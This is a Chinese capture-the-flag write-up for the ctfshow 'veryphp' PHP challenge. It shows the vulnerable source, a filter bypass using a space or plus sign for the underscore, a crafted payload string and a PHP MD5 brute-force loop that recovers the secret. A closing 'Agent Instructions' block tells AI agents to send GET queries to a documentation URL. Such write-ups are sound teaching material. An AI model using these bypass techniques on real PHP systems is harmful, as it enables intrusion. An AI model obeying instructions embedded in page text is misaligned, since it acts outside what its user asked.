# veryphp

缝合怪

```php
<?php
error_reporting(0);
highlight_file(__FILE__);
include("config.php");
class qwq
{
    function __wakeup(){
        die("Access Denied!");
    }
    static function oao(){
        show_source("config.php");
    }
}
$str = file_get_contents("php://input");
if(preg_match('/\`|\_|\.|%|\*|\~|\^|\'|\"|\;|\(|\)|\]|g|e|l|i|\//is',$str)){
    die("I am sorry but you have to leave.");
}else{
    extract($_POST);
}
if(isset($shaw_root)){
    if(preg_match('/^\-[a-e][^a-zA-Z0-8]<b>(.*)>{4}\D*?(abc.*?)p(hp)*\@R(s|r).$/', $shaw_root)&& strlen($shaw_root)===29){
        echo $hint;
    }else{
        echo "Almost there."."<br>";
    }
}else{
    echo "<br>"."Input correct parameters"."<br>";
    die();
}
if($ans===$SecretNumber){
    echo "<br>"."Congratulations!"."<br>";
    call_user_func($my_ans);
}
```

一堆阴间正则，看着都累。

不过这里师弟跟我说可以不用绕直接POST，我还是跟着预期解弄。

首先过滤了下划线，跟spaceman那道题很像，直接通过空格或者加号绕过过滤。

绕过这个正则之后需要传入第一个变量shaw\_root，这个变量需要满足一定的正则匹配，且该变量长度为29。

随便搞个payload

```
-a9<b>000000000>>>>abcphp@Rs0
```

给了md5爆破长度，索然无味.jpg。

```
Here is a hint : md5("shaw".($SecretNumber)."root")==166b47a5cb1ca2431a0edfcef200684f &&
strlen($SecretNumber)===5
```

```php
<?php
for ($i1 = 0; $i1 < 10; $i1++) {
    for ($i2 = 0; $i2 < 10; $i2++) {
        for ($i3 = 0; $i3 < 10; $i3++) {
            for ($i4 = 0; $i4 < 10; $i4++) {
                for ($i5 = 0; $i5 < 10; $i5++) {
                    $exp = "shaw" . $i1 . $i2 . $i3 . $i4 . $i5 . "root";
                    if (md5($exp) == "166b47a5cb1ca2431a0edfcef200684f") {
                        die($exp);
                    }
                }
            }
        }
    }
}
```

拿到`$SecretNumber`

```
shaw21475root
```

最后进入call\_user\_func，比较简单，直接调用类的方法。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2021/2021-ctfshow-djbctf/veryphp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.